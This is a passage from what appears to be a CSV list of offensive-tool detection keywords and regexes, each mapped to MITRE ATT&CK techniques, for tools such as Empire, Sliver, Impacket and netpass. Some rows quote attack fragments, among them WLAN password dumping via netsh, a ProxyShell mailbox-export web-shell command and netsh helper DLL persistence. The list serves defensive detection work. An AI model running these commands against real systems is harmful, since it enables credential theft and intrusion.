current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netpass-x64.zip*",".{0,1000}netpass\-x64\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. 
Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh add helper netshBad.DLL*",".{0,1000}netsh\sadd\shelper\snetshBad\.DLL.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*",".{0,1000}netsh\swlan\sshow\sprofile\s\$wlan\skey\=clear\s\|\sSelect\-String\s.{0,1000}\?\<\=Key\sContent\\s\+\:\\s.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*netsh.exe interface ip delete arpcache >C:\Windows\TEMP\ipconfig.out 2>&1*",".{0,1000}netsh\.exe\sinterface\sip\sdelete\sarpcache\s\>C\:\\Windows\\TEMP\\ipconfig\.out\s2\>\&1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*NetshHelperBeacon.exe*",".{0,1000}NetshHelperBeacon\.exe.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*netsniff-ng*",".{0,1000}netsniff\-ng.{0,1000}","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netstat -tnlp || ss -tnlp*",".{0,1000}netstat\s\-tnlp\s\|\|\sss\s\-tnlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*netstat -unlp || ss -unlp*",".{0,1000}netstat\s\-unlp\s\|\|\sss\s\-unlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - 
TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*nettitude/ETWHash*",".{0,1000}nettitude\/ETWHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*nettitude/MalSCCM*",".{0,1000}nettitude\/MalSCCM.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*netuser_enum*",".{0,1000}netuser_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*netview.py*",".{0,1000}netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*netview_enum*",".{0,1000}netview_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*network2john.lua*",".{0,1000}network2john\.lua.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*networking\dhcp_dns_update_utils.py*",".{0,1000}networking\\dhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*NetworkMiner*",".{0,1000}NetworkMiner.{0,1000}","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*New credentials found for user * on *",".{0,1000}New\scredentials\sfound\sfor\suser\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations.
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*new session to 127.0.0.1:3000*",".{0,1000}new\ssession\sto\s127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*NewAdminAccountCreation.ps1*",".{0,1000}NewAdminAccountCreation\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*NewConsole creates the sliver client (and console)*",".{0,1000}NewConsole\screates\sthe\ssliver\sclient\s\(and\sconsole\).{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-HoneyHash*",".{0,1000}New\-HoneyHash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*New-HoneyHash.ps1*",".{0,1000}New\-HoneyHash\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-InMemoryModule -ModuleName Win32*",".{0,1000}New\-InMemoryModule\s\-ModuleName\sWin32.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-InMemoryModule*",".{0,1000}New\-InMemoryModule.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-InMemoryModule*",".{0,1000}New\-InMemoryModule.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*",".{0,1000}New\-MailBoxExportRequest\s\-Mailbox\s.{0,1000}\@.{0,1000}\s\-FilePath\s.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*New-Object System.Management.ManagementClass(""\\\$env:computername\root\cimv2*[""__CLASS""] = 
""PMEClass""*",".{0,1000}New\-Object\sSystem\.Management\.ManagementClass\(\""\\\\\\\$env\:computername\\root\\cimv2.{0,1000}\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*new-operator --name * --lhost *",".{0,1000}new\-operator\s\-\-name\s.{0,1000}\s\-\-lhost\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*New-PacketSMB2IoctlRequest*",".{0,1000}New\-PacketSMB2IoctlRequest.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*New-PSAmsiScanner -*",".{0,1000}New\-PSAmsiScanner\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *",".{0,1000}New\-PSDrive\s\-Name\sT\s\-PSProvider\sFileSystem\s\-Root\s\\\\\$IP\\transfer\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*New-RoutingPacket*",".{0,1000}New\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
